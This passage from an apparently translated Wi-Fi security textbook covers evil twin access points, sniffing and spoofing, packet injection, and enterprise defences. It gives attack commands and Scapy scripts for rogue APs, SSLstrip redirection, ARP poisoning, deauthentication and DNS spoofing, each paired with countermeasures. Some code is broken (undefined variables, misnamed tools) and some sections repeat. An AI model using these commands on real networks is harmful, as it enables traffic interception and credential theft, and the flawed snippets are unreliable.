2. Navigate to WPS Settings: Access the security or advanced configuration section.
3. Disable WPS: Find the WPS option and disable it. Save Changes.
Defense: Firmware Update
1. Download do Firmware: Visit your router manufacturer's website and download
the latest firmware.
2. Access to the Administration Interface: Use a browser to access the router
administration interface.
3. Load and Update Firmware: Navigate to the firmware update section, select the
downloaded file and follow the instructions to complete the update.

Exploiting vulnerabilities in WPS can allow attackers to effectively compromise the security of
Wi-Fi networks. Tools like Reaver, Pixiewps, and Bully are widely used to carry out these
attacks. However, defensive measures such as disabling WPS, using WPA3, implementing
strong passwords, keeping firmware updated, monitoring the network, and educating users are
essential to protect against these threats. Applying these security strategies helps ensure the
integrity and confidentiality of Wi-Fi networks, mitigating the risks associated with WPS
vulnerabilities.
CHAPTER 8: EVIL TWIN ATTACKS

Understanding Evil Twin


Evil Twin attacks are a common and effective technique used to compromise Wi-Fi networks. In
this type of attack, the attacker sets up a malicious access point (AP) that imitates a legitimate
AP. Innocent users, when trying to connect to the legitimate AP, end up connecting to the
malicious AP, allowing the attacker to intercept and possibly modify network traffic.

How Evil Twin Works


In an Evil Twin attack, the attacker creates an access point with the same name (SSID) and
settings as a legitimate AP. When devices try to connect to the network, they may choose the
malicious AP, especially if the latter's signal is stronger or if the legitimate AP is temporarily out
of range.
The basic steps of an Evil Twin attack include:
1. Creation of the Malicious AP: Configuring an access point that imitates the
legitimate AP.
2. Force Disconnects: Attacker can use deauthentication techniques to disconnect
devices from legitimate AP.
3. Credential Capture: When devices connect to the malicious AP, the attacker can
capture passwords and other sensitive data.

Malicious Access Point Configuration


Setting up a malicious access point requires specific tools and techniques. Below, we detail how
to configure a malicious AP using tools like Airbase-ng and Hostapd.

Uso de Airbase-ng
Airbase-ng is a tool from the Aircrack-ng package used to create fake access points.
Installation:
bash
sudo apt install aircrack-ng

Placing the Interface in Monitor Mode: Before starting the malicious AP, it is necessary to put
the network interface into monitor mode.
bash
sudo airmon-ng start wlan0

Creation of the Malicious AP: Run Airbase-ng to create an access point with the same SSID as
the legitimate AP.
bash
sudo airbase-ng -e "NomeDoSSID" wlan0mon

Using Hostapd
Hostapd is a powerful tool for configuring access points and can be used to create malicious APs
with more control over settings.
Installation:
bash
sudo apt install hostapd

Hostapd Configuration: Create a configuration file for Hostapd, e.g. hostapd.conf.


text
interface=wlan0
driver=nl80211
ssid=NameDoSSID
hw_mode=g
channel=6
auth_algs=1
wpa=2
wpa_passphrase=senha123

Launch Malicious AP: Run Hostapd with the created configuration file.
bash
sudo hostapd hostapd.conf

Tools and Techniques


In addition to Airbase-ng and Hostapd, there are other tools and techniques used to carry out Evil
Twin attacks and capture user data.

Wireshark
Wireshark is a packet analysis tool that can be used to capture and analyze network traffic
intercepted by malicious AP.
Installation:
bash
sudo apt install wireshark

Basic Use:
Start Wireshark with superuser privileges:
bash
sudo wireshark

Select the network interface and start packet capture.


Analyze captured packets to extract sensitive information.

SSLstrip
SSLstrip is a tool used to intercept and convert HTTPS connections to HTTP, allowing the
attacker to capture data that would otherwise be protected by encryption.
Installation:
bash
sudo apt install sslstrip

Execution:
Configure iptables to redirect HTTP and HTTPS traffic to SSLstrip.
bash
sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8080

Start SSLstrip to intercept traffic:


bash
sudo sslstrip -l 8080
Ettercap
Ettercap is a comprehensive MITM attack tool that can be used in conjunction with Evil Twin
attacks to perform ARP spoofing and data capture.
Installation:
bash
sudo apt install ettercap-graphical

Basic Use:
Start Ettercap in graphical mode:
bash
sudo ettercap -G
1.
2. Select the network interface and start sniffing.
3. Configure and launch ARP spoofing attacks to redirect traffic to the
malicious AP.

Counter-Attack Measures
Protecting a Wi-Fi network against Evil Twin attacks requires a combination of best security
practices, monitoring tools, and user education.

Using VPN
Using VPNs can protect transmitted data, even if the user connects to a malicious AP. VPN
creates an encrypted tunnel between the user's device and the VPN server, protecting data from
interception.
● VPN Configuration: Use reliable VPN services like NordVPN or ExpressVPN. Install
the VPN client on your device and connect whenever you access public Wi-Fi networks.

HTTPS implementation
Make sure all websites and services use HTTPS to encrypt traffic between the client and server.
HTTPS protects data from interception, making it useless to the attacker.
● HTTPS Check: Instruct users to always check the browser address bar for the presence
of HTTPS.

Duplicate AP Detection
Network monitoring tools can help detect duplicate APs (with the same SSID) on the network.
Implementing intrusion detection systems (IDS) and performing regular scans can help identify
and neutralize malicious APs.
● Use of Kismet: Kismet is a wireless network detection tool that can identify duplicate
APs.
Installation:
bash
sudo apt install kismet

Execution:
bash
sudo kismet

ARP Spoofing Protection


Configuring ARP spoofing protection on your router and switches can help prevent traffic
redirection to malicious APs.
● Configuration on the Router: Access the router's administration interface and enable
ARP spoofing protection, if available.

Network Segmentation
Segmenting the network can limit the impact of an Evil Twin attack by isolating different types
of traffic and devices. Use VLANs to separate critical devices from general-purpose devices.
● VLAN configuration: Configure VLANs on the router and switches to isolate different
types of traffic.

User Education
Educating users about security threats and best practices can help prevent Evil Twin attacks.
Teach users to recognize signs of network compromises and take preventive measures.
● Good Security Practices:
○ Check the presence of HTTPS on the websites accessed.
○ Do not connect to unknown Wi-Fi hotspots.
○ Use VPNs when accessing public Wi-Fi networks.
Practical Examples of Execution and Defense
Creating Malicious AP with Airbase-ng
Put the Interface in Monitor Mode:
bash
sudo airmon-ng start wlan0

Create the Malicious AP:


bash
sudo airbase-ng -e "NomeDoSSID" wlan0mon

Configure Traffic Redirection: Configure iptables to redirect HTTP and HTTPS traffic.
bash
sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8080

SSLstrip execution
Instalar SSLstrip:
bash
sudo apt install sslstrip

Iniciar SSLstrip:
bash
Copy code
sudo sslstrip -l 8080

Using Ettercap for ARP Spoofing


Install and Start Ettercap:
bash
sudo apt install ettercap-graphical
sudo ettercap -G

Configure ARP Spoofing: Select the network interface, add victims (target devices) and launch
the ARP spoofing attack.

Defense: Using VPN


1. Choose a VPN Service: Sign up for a reliable VPN service like NordVPN or
ExpressVPN.
2. VPN Client Configuration: Follow your VPN provider's instructions to install and
configure the VPN client on your device.
3. Connect to VPN: Connect to VPN whenever you access public or unsecured Wi-Fi
networks.

Defense: Duplicate AP Detection with Kismet


Install Kismet:
bash
sudo apt install kismet

Run Kismet:
bash
Copy code
sudo kismet

Monitor Duplicate APs: Use Kismet to identify and monitor duplicate APs on the network.

Evil Twin attacks are a serious threat to the security of Wi-Fi networks, allowing attackers to
intercept and modify communications without being detected. Understanding malicious AP
configuration techniques and the tools used, such as Airbase-ng, Hostapd, Wireshark, and
SSLstrip, is crucial for cybersecurity professionals. Countermeasures, including using VPNs,
implementing HTTPS, detecting duplicate APs, protecting against ARP spoofing, network
segmentation, and educating users, are essential to protect against these threats. Practical
application of these defense strategies helps ensure the integrity and confidentiality of Wi-Fi
networks, mitigating the risks associated with Evil Twin attacks.
CHAPTER 9: PACKET SNIFFING AND
SPOOFING

Sniffing and Spoofing Fundamentals


Packet sniffing and spoofing are essential techniques used in network attacks. Sniffing refers to
the act of capturing and analyzing data packets traveling across a network, while spoofing
involves spoofing data packets to trick devices or systems. These techniques are often used
together to compromise network security and obtain confidential information.

Packet Sniffing
Packet sniffing is the process of intercepting and recording data packets traveling across a
network. This technique can be used both for legitimate purposes, such as network monitoring
and diagnostics, and for malicious activities, such as espionage and data theft.
● How Sniffing Works: Packet sniffing is performed by putting the network interface into
promiscuous mode, allowing it to capture all packets on the network, not just those
destined for it. Sniffing tools like Wireshark and Tcpdump are used to capture and
analyze these packets.

Package Spoofing
Packet spoofing is the technique of falsifying data packets to trick network devices or systems.
This technique can be used for various malicious purposes, such as redirecting network traffic,
carrying out denial of service (DoS) attacks, or carrying out man-in-the-middle (MITM) attacks.
● Common Types of Spoofing:
○ IP Spoofing: Sending packets with a spoofed source IP address.
○ MAC Spoofing: Spoofing a device's MAC address.
○ DNS Spoofing: Redirect DNS queries to malicious servers.

Sniffing and Spoofing Tools


There are several tools available to perform packet sniffing and spoofing. Below we discuss
some of the most popular and effective ones.

Wireshark
Wireshark is a powerful packet analysis tool, widely used for network sniffing. Allows you to
capture and visualize packages in real time, offering an intuitive graphical interface for detailed
analysis.
Installation:
bash
sudo apt install wireshark

Basic Use:
Start Wireshark with superuser privileges:
bash
sudo wireshark

Select the network interface and start packet capture.


Use filters to focus on specific types of traffic, for example:
text
http

Tcpdump
Tcpdump is a command-line tool for capturing packets. It is useful for quick captures and basic
network traffic analysis.
Installation:
bash
sudo apt install tcpdump

Basic Use:
Start packet capture on the specified network interface:
bash
sudo tcpdump -i wlan0

To save the capture to a file for later analysis:


bash
sudo tcpdump -i wlan0 -w captura.pcap
Ettercap
Ettercap is a comprehensive tool for MITM attacks, including packet sniffing and spoofing.
Supports various attack techniques such as ARP spoofing and DNS spoofing.
Installation:
bash
sudo apt install ettercap-graphical

Basic Use:
Start Ettercap in graphical mode:
bash
sudo ettercap -G

1. Select the network interface and start sniffing.


2. Configure spoofing attacks, such as ARP spoofing, to redirect network
traffic.

Scapy
Scapy is a powerful package manipulation library in Python. It can be used to create custom
scripts for packet sniffing and spoofing.
Installation:
bash
sudo apt install python3-scapy

Example of the sniffing script:


python
from scapy.all import *
def packet_callback(packet):
if packet.haslayer(DNS) and packet.getlayer(DNS).qr == 0:
print(packet.show())
sniff(filter="udp port 53", prn=packet_callback, store=0)

Spoofing Script Example:


python
from scapy.all import *
def spoof(pkt):
if pkt.haslayer(IP):
ip = IP(src="192.168.1.1", dst=pkt[IP].src)
icmp = ICMP(type=0, id=pkt[ICMP].id, seq=pkt[ICMP].seq)
data = pkt[Raw].load
spoofed_pkt = ip/icmp/data
send(spoofed_pkt)
sniff(filter="icmp", prn=spoof)

Practical cases
To illustrate how sniffing and spoofing techniques are applied in practice, let's explore some
practical cases.

HTTP Traffic Capture with Wireshark


Iniciar Wireshark:
bash
sudo wireshark

Select Network Interface: Select the network interface where you want to capture packets and
click "Start".
Apply Capture Filter: Use the filter to focus on HTTP packets:
text
http

Analyze Captured Packets: Inspect captured packets to view HTTP requests and responses.
You can see URLs, HTTP headers, and even transmitted data in clear text.

ARP Spoofing com Ettercap


Start Ettercap in Graphics Mode:
bash
sudo ettercap -G
Select Network Interface: Choose the network interface and click "Start Sniffing".
Add Victims: Add router IP address and target device IP address as victims.
Iniciar ARP Spoofing: Select "MitM" -> "ARP poisoning" and start the attack. Ettercap will
begin redirecting traffic between victims.
Capture and Analyze Packets: Use Ettercap's packet capture functionality or export the data for
further analysis in Wireshark.

Spoofing de DNS com Scapy


1. Configure and Run the Spoofing Script: Create and run a Python script using
Scapy to perform DNS spoofing.
Script de Spoofing de DNS:
python
from scapy.all import *
def dns_spoof(pkt):
if pkt.haslayer(DNS) and pkt.getlayer(DNS).qr == 0:
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,
an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=" 192.168.1.100")
send(spoofed_pkt)
sniff(filter="udp port 53", prn=dns_spoof)

2. Analyze the Results: This script redirects all DNS requests to the IP 192.168.1.100.
Use Wireshark to capture and verify modified DNS packets.

Defense Techniques
Protecting a network against packet sniffing and spoofing requires a combination of good
security practices, monitoring tools, and user education.

Traffic Encryption
Encryption is the most effective defense against packet sniffing. Using HTTPS, VPNs, and end-
to-end encryption ensures that even if packets are intercepted, the data remains inaccessible to
the attacker.
● Using HTTPS: Make sure all websites and web services use HTTPS. Network
administrators must force the use of HTTPS on all connections.
● VPN Configuration: Set up and use VPNs to encrypt all network traffic, especially when
accessing public Wi-Fi networks.

Implementing Security in Wi-Fi Networks


Properly configuring Wi-Fi network security is crucial to preventing sniffing and spoofing.
● Using WPA3: WPA3 offers significantly improved security compared to WPA2.
Configure the router to use WPA3 if available.
● Disabling WPS: WPS is vulnerable to brute force attacks. Disable it on your router to
avoid these vulnerabilities.

Network Monitoring
Implementing network monitoring systems can help detect suspicious activity in real time.
● Use of IDS/IPS: Tools like Snort or Zeek can be configured to monitor network traffic
and alert you to suspicious activity such as ARP spoofing or packet interception attempts.
Snort Configuration:
bash
sudo apt install snort
● Configure specific rules to detect spoofing and sniffing attacks.

ARP Spoofing Protection


Enabling ARP spoofing protection on routers and switches can prevent ARP spoofing attacks.
● Configuration on the Router: Access the router's administration interface and enable
ARP spoofing protection, if available.
● Configuring Managed Switches: Use managed switches to configure security rules that
prevent ARP spoofing.

User Education
Educating users about good security practices and how to identify signs of attacks can help
prevent compromises.
● Good Security Practices:
○ Do not click on suspicious links.
○ Check the presence of HTTPS on the websites accessed.
○ Use strong and unique passwords for each service.

Practical Examples of Execution and Defense


Traffic Capture with Tcpdump
Start Tcpdump:
bash
sudo tcpdump -i wlan0

Save Capture to a File:


bash
Copy code
sudo tcpdump -i wlan0 -w captura.pcap

Analyze the Capture in Wireshark: Open Wireshark and upload the file capture.pcap for
detailed analysis.

Implementing HTTPS on a Web Server


1. Obtaining an SSL/TLS Certificate: Use Let's Encrypt to get a free certificate.
Instalar Certbot:
bash
sudo apt install certbot

Get Certificate:
bash
sudo certbot --apache

2. Web Server Configuration: Configure the web server (Apache, Nginx) to use the
obtained SSL/TLS certificate.

VPN Configuration
1. Choose a VPN Service: Sign up for a reliable VPN service like NordVPN or
ExpressVPN.
2. Install the VPN Client: Follow your VPN provider's instructions to install and
configure the VPN client on your device.
3. Connect to VPN: Connect to VPN whenever you access public or unsecured Wi-Fi
networks.

Packet sniffing and spoofing are powerful techniques that can seriously compromise network
security. Tools like Wireshark, Tcpdump, Ettercap, and Scapy make these techniques easy to
perform. However, applying defensive measures such as traffic encryption, implementing
security on Wi-Fi networks, continuous network monitoring, ARP spoofing protection, and user
education are essential to protect against these threats. Practicing these defense strategies helps
ensure the integrity and confidentiality of network communications, mitigating the risks
associated with packet sniffing and spoofing.
CHAPTER 10: PACKET INJECTION

What is Packet Injection


Packet injection is a technique used to send malicious or manipulated data packets across a
network. This method allows the attacker to interfere with network communication, modify or
falsify data packets, and even exploit vulnerabilities in target systems. Packet injection can be
used for a variety of attacks, including deauthentication attacks, man-in-the-middle (MITM), and
denial-of-service (DoS) attacks.

How Packet Injection Works


Packet injection involves the creation and transmission of data packets that were not generated
by a legitimate device on the network. This can be done by manipulating the structure of the
packets, changing the source and destination addresses, or inserting malicious data into the
packets. The technique is often used in combination with other forms of network attacks to
increase their effectiveness.
● Purpose: Packet injection can be used to deauthenticate users, intercept communications,
redirect traffic, or exploit vulnerabilities in network devices.
● Requirements: To perform packet injection, it is necessary to have access to the target
network, a device with monitor mode capability and specific tools to create and inject
packets.

Tools and Methods


There are several tools and methods used to perform packet injection. Below we discuss some of
the most popular and effective ones.

Aircrack-ng
The Aircrack-ng toolset includes several tools that support packet injection, one of the best
known of which is airplay-ng.
Installation:
bash
sudo apt install aircrack-ng

Using Aireplay-ng for Packet Injection: airplay-ng can be used to perform different types of
packet injection attacks such as deauthentication attacks.
Put the Interface in Monitor Mode:
bash
sudo airmon-ng start wlan0

Deauthentication Attack:
bash
sudo aireplay-ng --deauth 0 -a [BSSID] -c [CLIENT_MAC] wlan0mon

■ -a [BSSID]: Specifies the MAC address of the access point.


■ -c [CLIENT_MAC]: Specifies the MAC address of the client.

Scapy
Scapy is a powerful Python packet manipulation library used to create, modify, and inject data
packets into networks.
Installation:
bash
sudo apt install python3-scapy

● Using Scapy for Packet Injection: Scapy allows you to create custom scripts for packet
injection.
ICMP Packet Injection Script Example:
python
from scapy.all import *
# Create an ICMP packet
pkt = IP(dst="192.168.1.1")/ICMP()
# Inject the packet into the network
send(pts)

ARP Packet Injection Script Example:


python
from scapy.all import *
# Create an ARP packet
pkt = ARP(op=2, pdst="192.168.1.1", hwdst="ff:ff:ff:ff:ff:ff", psrc="192.168.1.2")
# Inject the packet into the network
send(pts)

Ettercap
Ettercap is a MITM attack tool that supports packet injection, allowing you to redirect and
manipulate network traffic.
Installation:
bash
sudo apt install ettercap-graphical

Basic Usage for Packet Injection:


Start Ettercap in graphical mode:
bash
sudo ettercap -G
1.
2. Select the network interface and start sniffing.
3. Configure and execute packet injection attacks to manipulate traffic between
target devices.

Practical examples
To illustrate how packet injection techniques are applied in practice, let's explore some detailed
examples.

Packet Injection with Aireplay-ng


Put the Interface in Monitor Mode:
bash
sudo airmon-ng start wlan0

Identify Access Points and Clients: Use airodump-ng to identify access points and clients on
the network.
bash
sudo airodump wlan0mon

Perform Deauthentication Attack: Inject deauthentication packets to disconnect clients from


the access point.
bash
sudo airplay --deauth 0 -a 00:11:22:33:44:55 -c 66:77:88:99:AA:BB wlan0mon

Packet Injection with Scapy


ICMP Packet Injection: Create and inject ICMP packets into the network to test the response of
devices.
python
from scapy.all import *
# Create an ICMP packet
pkt = IP(dst="192.168.1.1")/ICMP()
# Inject the packet into the network
send(pts)

ARP Packet Injection: Perform an ARP spoofing attack to redirect network traffic.
python
from scapy.all import *
# Create an ARP packet
pkt = ARP(op=2, pdst="192.168.1.1", hwdst="ff:ff:ff:ff:ff:ff", psrc="192.168.1.2")
# Inject the packet into the network
send(pts)

Packet Injection with Ettercap


Start Ettercap in Graphics Mode:
bash
sudo ettercap -G

Select Network Interface and Start Sniffing: Choose the network interface used and click
"Start Sniffing".
Configure Packet Injection Attacks: Configure Ettercap to perform packet injection attacks
and manipulate network traffic between target devices.
Injection Attack Mitigation
Protecting a network against packet injection attacks requires implementing comprehensive
security measures and utilizing monitoring tools. Below, we discuss some effective strategies to
mitigate these attacks.

Traffic Encryption
Encryption is the most effective defense against packet injection. Using HTTPS, VPNs, and end-
to-end encryption ensures that even if packets are intercepted, the data remains inaccessible to
the attacker.
● Using HTTPS: Make sure all websites and web services use HTTPS. This can be forced
on web servers by configuring HTTP to HTTPS redirects.
● VPN Configuration: Set up and use VPNs to encrypt all network traffic, especially when
accessing public Wi-Fi networks.

Implementing Security in Wi-Fi Networks


Correctly configuring Wi-Fi network security is crucial to preventing packet injection.
● Using WPA3: WPA3 offers significantly improved security compared to WPA2.
Configure the router to use WPA3 if available.
● Disabling WPS: WPS is vulnerable to brute force attacks. Disable it on your router to
avoid these vulnerabilities.

Network Monitoring
Implementing network monitoring systems can help detect suspicious activity in real time.
● Use of IDS/IPS: Tools like Snort or Zeek can be configured to monitor network traffic
and alert you to suspicious activity such as packet injection attempts.
Snort Configuration:
bash
sudo apt install snort
● Configure specific rules to detect packet injection attacks.

ARP Spoofing Protection


Enabling ARP spoofing protection on routers and switches can prevent spoofing attacks that
facilitate packet injection.
● Configuration on the Router: Access the router's administration interface and enable
ARP spoofing protection, if available.
● Configuring Managed Switches: Use managed switches to configure security rules that
prevent ARP spoofing.

User Education
Educating users about good security practices and how to identify signs of attacks can help
prevent compromises.
● Good Security Practices:
○ Do not click on suspicious links.
○ Check the presence of HTTPS on the websites accessed.
○ Use strong and unique passwords for each service.

Practical Examples of Execution and Defense


Packet Injection with Aireplay-ng
Put the Interface in Monitor Mode:
bash
sudo airmon-ng start wlan0

Identify Access Points and Clients: Use airodump-ng to identify access points and clients on
the network.
bash
sudo airodump wlan0mon

Perform Deauthentication Attack: Inject deauthentication packets to disconnect clients from


the access point.
bash
sudo airplay --deauth 0 -a 00:11:22:33:44:55 -c 66:77:88:99:AA:BB wlan0mon

Packet Injection with Scapy


ICMP Packet Injection: Create and inject ICMP packets into the network to test the response of
devices.
python
from scapy.all import *
# Create an ICMP packet
pkt = IP(dst="192.168.1.1")/ICMP()
# Inject the packet into the network
send(pts)

ARP Packet Injection: Perform an ARP spoofing attack to redirect network traffic.
python
from scapy.all import *
# Create an ARP packet
pkt = ARP(op=2, pdst="192.168.1.1", hwdst="ff:ff:ff:ff:ff:ff", psrc="192.168.1.2")
# Inject the packet into the network
send(pts)

Packet Injection with Ettercap


Start Ettercap in Graphics Mode:
bash
sudo ettercap -G

Select Network Interface and Start Sniffing: Choose the network interface used and click
"Start Sniffing".
Configure Packet Injection Attacks: Configure Ettercap to perform packet injection attacks
and manipulate network traffic between target devices.

Defense: Use of HTTPS


1. Obtaining an SSL/TLS Certificate: Use Let's Encrypt to get a free certificate.
Instalar Certbot:
bash
sudo apt install certbot

Get Certificate:
bash
sudo certbot --apache
2. Web Server Configuration: Configure the web server (Apache, Nginx) to use the
obtained SSL/TLS certificate.

Defense: VPN Configuration


1. Choose a VPN Service: Sign up for a reliable VPN service like NordVPN or
ExpressVPN.
2. Install the VPN Client: Follow your VPN provider's instructions to install and
configure the VPN client on your device.
3. Connect to VPN: Connect to VPN whenever you access public or unsecured Wi-Fi
networks.

Packet injection is a powerful technique that can seriously compromise network security. Tools
like Aircrack-ng, Scapy, and Ettercap make this technique easy to perform, allowing attackers to
manipulate network traffic for their own purposes. However, applying defensive measures such
as traffic encryption, implementing security on Wi-Fi networks, continuous network monitoring,
ARP spoofing protection, and user education are essential to protect against these threats.
Practicing these defense strategies helps ensure the integrity and confidentiality of network
communications by mitigating the risks associated with packet injection.
CHAPTER 11: ENTERPRISE WI-FI
NETWORK SECURITY

Specific Challenges of Corporate Networks


Corporate Wi-Fi networks present unique challenges compared to home networks due to the
greater number of devices, the need to protect sensitive data, and compliance with specific
regulations. The security of these networks is crucial to guarantee the confidentiality, integrity
and availability of corporate data.

Device Volume
In a corporate network, the number of connected devices is significantly greater than in a home
network. This includes not only laptops and desktops, but also mobile, IoT (Internet of Things),
and guest devices. Each additional device increases the network's attack surface.

Internal and External Threats


Corporate networks are targets of internal and external threats. Internal threats can come from
disgruntled or negligent employees who have legitimate access to the network, while external
threats include hackers trying to access the network from the outside.

Regulatory Compliance
Companies need to comply with specific data security regulations, such as GDPR, HIPAA and
PCI-DSS. These regulations require strict data protection measures and can result in severe
penalties for violations.

Mobility and BYOD


The Bring Your Own Device (BYOD) trend allows employees to use their own devices to access
the corporate network. While this increases productivity, it also introduces security risks as
personal devices may not be as well protected as company-managed devices.

Implementation of Security Measures


To protect a corporate Wi-Fi network, it is essential to implement robust security measures that
encompass authentication, encryption, network segmentation, and continuous monitoring.
Authentication and Access Control
Implementing strong authentication mechanisms is crucial to ensure that only authorized users
can access the network.
● WPA3-Enterprise Authentication: WPA3-Enterprise uses EAP (Extensible
Authentication Protocol) for authentication, providing greater security compared to
WPA2-Enterprise.
○ WPA3-Enterprise Configuration: Configure the router and client devices to use
WPA3-Enterprise with a RADIUS server for centralized authentication.
○ RADIUS Server: Use a RADIUS server to manage authentication credentials and
enforce access policies.
● Two-Factor Authentication (2FA): Implementing 2FA adds an extra layer of security
by requiring users to provide two forms of authentication.
○ 2FA Example: Use authentication apps like Google Authenticator or hardware
tokens.

Traffic Encryption
Encrypting network traffic is essential to protect data against interception and espionage.
● Use of HTTPS and VPNs: Make sure all websites and web services use HTTPS. Set up
VPNs to encrypt network traffic, especially for employees who work remotely.
● End-to-End Encryption: Implement end-to-end encryption for internal communications,
ensuring data remains secure throughout the journey.

Network Segmentation
Segmenting the network can limit the impact of an attack by isolating different types of traffic
and devices.
● Use of VLANs: Configure VLANs on the router and switches to isolate critical devices,
guest devices, and employee devices.
● Guest Networks: Set up a separate guest network that is isolated from the main corporate
network.

Continuous Monitoring
Implementing continuous monitoring systems can help detect suspicious activity and quickly
respond to security incidents.
● Intrusion Detection Systems (IDS): Tools like Snort or Zeek can be configured to
monitor network traffic and alert you to suspicious activity.
● Intrusion Prevention Systems (IPS): An IPS can automatically block detected malicious
activity, adding a layer of proactive defense.
Update and Patching
Keeping all devices and software up to date is crucial to protect against known vulnerabilities.
● Update Policies: Implement strict update policies that ensure all devices and software are
updated regularly.
● Patch Management: Use patch management tools to automate the update process and
ensure compliance with security policies.

Monitoring and Defense Tools


There are several tools available for monitoring and defending corporate Wi-Fi networks. Below,
we discuss some of the most effective.

Wireshark
Wireshark is the packet analysis tool that can be used to monitor and analyze network traffic in
real-time.
Installation:
bash
sudo apt install wireshark

Basic Use:
Start Wireshark with superuser privileges:
bash
sudo wireshark

Select the network interface and start packet capture.


Use filters to focus on specific types of traffic, for example:
text
http

Snort
Snort is an intrusion detection tool (IDS) that can be configured to monitor network traffic and
alert you to suspicious activity.
Installation:
bash
sudo apt install snort

Basic Configuration: Configure specific rules to detect common attacks and malicious
activities.

Zeek (former Bro)


Zeek is a powerful network security monitoring platform that offers advanced traffic analysis
functionalities.
Installation:
bash
sudo apt install zeek

Basic Configuration: Configure Zeek to monitor network traffic and generate detailed logs of
suspicious activity.

Pfsense
Pfsense is an open source firewall platform that offers firewall, VPN, IDS/IPS, and more.
● Installation: Download Pfsense software from the official website and install it on
dedicated hardware or virtual machine.
● Basic Configuration: Configure Pfsense to act as a firewall, VPN and IDS/IPS,
enforcing strict security policies.

Case studies
Studying real security cases in corporate Wi-Fi networks can provide valuable insights into how
these techniques and tools are applied in practice.

Case 1: WPA3-Enterprise Implementation in


a Large Company
Context: A large technology company needed to upgrade the security of its Wi-Fi network to
protect sensitive data and ensure compliance with security regulations.
Implemented Measures:
● WPA3-Enterprise configuration with a RADIUS server for centralized authentication.
● Implementation of 2FA for all network users.
● Network segmentation using VLANs to isolate different types of devices and traffic.
Tools Used:
● Wireshark to monitor network traffic and verify encryption implementation.
● Snort configured as IDS to detect suspicious activity.
● Pfsense configured as firewall and IPS for additional protection.
Results:
● Network security has been significantly improved, with rapid detection and mitigation of
intrusion attempts.
● The company achieved compliance with safety regulations, avoiding penalties.

Case 2: Protection Against Insider Threats at


a Financial Services Company
Context: A financial services company faced insider threats from disgruntled employees who
had legitimate network access.
Implemented Measures:
● Continuous monitoring of network traffic using Zeek to detect suspicious activity.
● Implementation of strict access control policies, limiting access to sensitive data based on
the employee's role.
● Regularly updating all devices and software to protect against known vulnerabilities.
Tools Used:
● Configured Zeek to monitor network traffic and generate detailed activity logs.
● Snort configured as IDS to alert on unauthorized access attempts.
● Patch management tools to ensure all devices are up to date.
Results:
● Significant reduction in internal security incidents.
● Improved ability to detect and respond to threats in real time.

Case 3: Network Segmentation in a


Manufacturing Company
Context: A manufacturing company needed to isolate IoT devices from its critical systems to
protect against attacks.
Implemented Measures:
● Network segmentation using VLANs to isolate IoT devices from critical systems.
● Setting up a separate network for guest and visitor devices.
● Implementation of end-to-end encryption for internal communications.
Tools Used:
● Configured pfsense to manage VLANs and enforce security policies.
● Wireshark used to verify the correct segmentation of network traffic.
● Snort configured to monitor traffic and detect suspicious activity.
Results:
● Significant improvement in network security, with IoT devices isolated from critical
systems.
● Ability to quickly detect and mitigate unauthorized access attempts to critical devices.

Practical Examples of Execution and Defense


WPA3-Enterprise Configuration
1. Router Configuration: Access the router administration interface and configure the
network security to WPA3-Enterprise. Configure the RADIUS server for centralized
authentication.
2. RADIUS Server Configuration: Install and configure the RADIUS server to
manage authentication credentials and apply access policies.

2FA Implementation
1. Choosing a 2FA Solution: Use authentication apps like Google Authenticator or
hardware tokens.
2. 2FA Setup: Configure 2FA solution on corporate systems, requiring users to
provide two forms of authentication.

VLAN configuration
1. Configuring VLANs on the Router and Switches: Access the administration
interface of the router and switches and configure VLANs to isolate different types
of devices and traffic.
2. Segmentation Test: Use tools like Wireshark to verify the correct segmentation of
network traffic.

Continuous Monitoring with Snort


Snort Installation and Configuration:
bash
sudo apt install snort
Rules Configuration: Configure specific rules to detect common attacks and malicious
activities.
Traffic Monitoring: Configure Snort to monitor network traffic and generate alerts about
suspicious activity.

Ensuring the security of corporate Wi-Fi networks is an ongoing challenge that requires the
implementation of robust security measures and the use of advanced monitoring and defense
tools. Specific challenges, such as the sheer volume of devices, internal and external threats, and
the need for regulatory compliance, require a comprehensive approach. Applying strong
authentication, traffic encryption, network segmentation, and continuous monitoring helps
protect against threats and ensure the integrity and confidentiality of corporate data. Practical
case studies demonstrate the effectiveness of these strategies in protecting corporate networks.
CHAPTER 12: CREATING SECURE WI-
FI NETWORKS

Best Practices for Home and Corporate


Networks
Creating secure Wi-Fi networks is essential in both home and corporate environments to protect
data and prevent unauthorized access. Best practices vary slightly between these environments
due to their different needs and risks, but some basic principles apply to both.

Home Networks
In home networks, the main focus is to protect against unauthorized access and ensure the
privacy of personal data. Some best practices include:
● Using WPA3: Configure your router to use WPA3, which offers significantly improved
security compared to WPA2.
● Strong Password for Wi-Fi: Use long, complex passwords that include uppercase and
lowercase letters, numbers, and special characters.
● Regular Firmware Update: Keep your router's firmware updated to ensure all known
vulnerabilities are patched.
● Disabling WPS: Wi-Fi Protected Setup (WPS) is vulnerable to brute force attacks.
Disable it to avoid these vulnerabilities.
● Guest Networks: Set up a separate guest network, isolated from the main network, to
protect personal devices and data.

Corporate Networks
Corporate networks face more sophisticated threats and require more robust security measures.
Some best practices include:
● WPA3-Enterprise Authentication: Use WPA3-Enterprise with a RADIUS server for
centralized authentication and credential management.
● Network Segmentation with VLANs: Use VLANs to isolate different types of devices
and traffic, such as IoT devices, visitors, and critical systems.
● 2FA Implementation: Add two-factor authentication (2FA) to increase network access
security.
● Continuous Monitoring: Deploy intrusion detection and prevention systems (IDS/IPS)
to monitor network traffic and respond to suspicious activity.
● Strict Access Policies: Set role-based access control policies, limiting access to sensitive
data to authorized employees only.

Essential Security Settings


Implementing appropriate security settings on your router and connected devices is crucial to
protecting your Wi-Fi network. Below, we detail some essential settings.

WPA3 Configuration
WPA3 is the latest Wi-Fi security standard and offers improved protection against brute force
attacks and data interception.
● Router Configuration for WPA3:

1. Access the router's administration interface (usually accessible via a web


browser by typing in the router's IP address, such as 192.168.1.1).
2. Navigate to your wireless network security settings.
3. Select WPA3 as the authentication method.
